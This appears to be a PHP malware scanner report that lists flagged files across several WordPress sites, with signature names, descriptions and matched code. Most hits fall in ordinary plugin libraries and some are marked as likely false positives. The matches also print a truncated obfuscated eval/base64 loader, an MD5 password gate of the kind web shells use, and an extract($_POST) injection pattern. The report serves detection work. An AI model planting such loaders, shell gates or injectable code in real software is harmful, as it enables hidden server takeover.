eval('$func = function ($_action, &$self, $_text) { ' . $init_crypt . 'if ($_action == "encrypt") { ' . $encrypt . ' } else { ' . $decrypt . ' } };'); return $func; } function &_getLambdaFunctions() { static $functions = array(); return $functions; } function _hashInlineCryptFunction($bytes) { if (!isset(self::$WHIRLPOOL_AVAILABLE)) { self::$WHIRLPOOL_AVAILABLE = extension_loaded('hash') && in_array('whirlpool', hash_algos()); } $result = ''; $hash = $bytes; switch (true) { case self::$WHIRLPOOL...
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/phpseclib/Crypt/Hash.php Size: 28.64 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 2
| Description | Match |
|---|
Exploit php_uname Line: 870 Dangerous RCE (Remote Code Execution) allows remote attackers to execute arbitrary commands or code on the target machine |
php_uname('m')
| Sign 471b95ee Line: 525 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/www-root/data/www/android-apk.fun/adminer2.php Size: 356.21 kB Created: 2022-10-23 14:54:44 Modified: 2022-10-23 14:54:44 Dangers: 4
| Description | Match |
|---|
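Function strrev eval_strrev Line: 782 Dangerous Encoded Function `eval` [https://www.php.net/eval]: the match is `eval` spelled backwards, as it would appear before a `strrev` call. A four-letter match can be incidental, so check whether line 782 actually reverses and calls the string |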
LAVE
| Sign 085a0329 Line: 10 Dangerous Malware Signature (hash: 085a0329) |
ini_get("filter.default_flags")){foreach
| Sign 471b95ee Line: 584 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
| Sign f9dc0a55 Line: 580 Dangerous Malware Signature (hash: f9dc0a55) |
'base64_decode'
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 13:50:49 Modified: 2020-07-24 20:09:55 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:55 Dangers: 1
| Description | Match |
|---|
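Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells that are code-golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]. The match below is a call through an array element used as a function name, which ordinary plugin code also does; confirm whether the called name can be set from request data |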
$validation_rule['validation_class']()
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 37.62 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.34 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 652 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 9.95 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 31.62 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.14 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Dangers: 2
| Description | Match |
|---|
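Exploit execution2 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]. In the match below `array_filter` is called with `$allPatterns` only and no callback, and `$_GET` appears later in an `array_key_exists` check, so the shown text does not pass request data to a callback; review the file before treating this as RCE |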
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 40 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.84 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 70 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Dangers: 1
| Description | Match |
|---|
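Exploit hacked_by Line: 7576 Dangerous Hacker credits: the file contains the phrase `Hacked by`, which defacement pages and web shells use to credit their author. Only these two words are matched, so read line 7576 to see whether the phrase sits in a source comment of the spreadsheet library |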
Hacked by
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Dangers: 1
| Description | Match |
|---|
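Exploit extract_global Line: 12 Dangerous Code Injection: extracting a global request array (here `extract($_POST)`) turns every submitted parameter into a local variable, which allows remote attackers to overwrite variables in scope and inject PHP code on the target machine via HTTP request |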
extract($_POST)
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Warns: 3
| Description | Match |
|---|
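Exploit too_many_chr Line: 1071 Warning Concatenating many `chr` calls is a technique usually used for the obfuscation of malicious code. The arguments in this match are consecutive integers, which looks like a byte table rather than a hidden string; confirm in context |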
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
| Description | Match |
|---|
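Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval]: the match is the ROT13 form of `eval`. A four-letter match can occur inside an unrelated word, so check whether line 177 actually decodes and calls the string |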
riny
|
|
//var/www/msk/data/www/intimcity-msk.club/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-27 21:04:52 Modified: 2020-09-27 21:05:08 Warns: 1 Dangers: 1
| Description | Match |
|---|
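Exploit password_protection_md5 Line: 9 Warning File protected by an MD5 password check, a pattern typically used on web shells; the request parameter is hashed with unsalted MD5 and compared to a hard-coded digest with the loose `==` operator |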
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/msk/data/www/intimcity-msk.club/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-27 21:04:53 Modified: 2020-09-27 21:05:07 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/msk/data/www/intimcity-msk.club/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-27 21:04:53 Modified: 2020-09-27 21:05:07 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
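| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval]. In this match `eval` is given the output of a function with a random-looking name applied to a long encoded string, which is consistent with packed code rather than an incidental use |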
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d); the matched token below is the Base64 encoding of the function name `gzinflate` |
Z3ppbmZsYXRl
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/profile-builder-pro/add-ons/user-listing/userlisting.php Size: 136.84 kB Created: 2022-02-11 19:22:53 Modified: 2022-02-12 01:43:16 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1228 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/profile-builder-pro/assets/lib/Mustache/Engine.php Size: 22.10 kB Created: 2022-02-11 19:22:53 Modified: 2022-02-12 01:43:16 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('?>'.$this->compile($source)); } } $this->log( Mustache_Logger::DEBUG, 'Instantiating template: "{className}"', array('className' => $className) ); $this->templates[$className] = new $className($this); } return $this->templates[$className]; } private function tokenize($source) { return $this->getTokenizer()->scan($source); } private function parse($source) { return $this->getParser()->parse($this->tokenize($source)); } private function compile($source) { $tree = $this->parse($source); $name...
| Sign 11413268 Line: 602 Dangerous Malware Signature (hash: 11413268) |
eval('?>
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Dangers: 1
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.98 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7580 Dangerous Hacker credits |
Hacked by
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 9.13 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 186.03 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/themes/new-design/footer.php Size: 10.33 kB Created: 2022-03-18 11:47:33 Modified: 2022-03-18 11:47:33 Dangers: 1
|
//var/www/msk/data/www/prostitutki.moscow/wp-content/themes/new-design/header.php Size: 7.38 kB Created: 2022-04-22 16:47:00 Modified: 2022-04-22 16:47:00 Dangers: 1
|
//var/www/msk/data/www/prostitutki.moscow/script_smartwall/update.php Size: 9.06 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/msk/data/www/prostitutki.moscow/script_smartwall/index.php Size: 38.45 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/msk/data/www/prostitutki.moscow/script_smartwall/smartwall.php Size: 8.87 kB Created: 2022-02-11 19:22:54 Modified: 2022-02-12 01:43:16 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
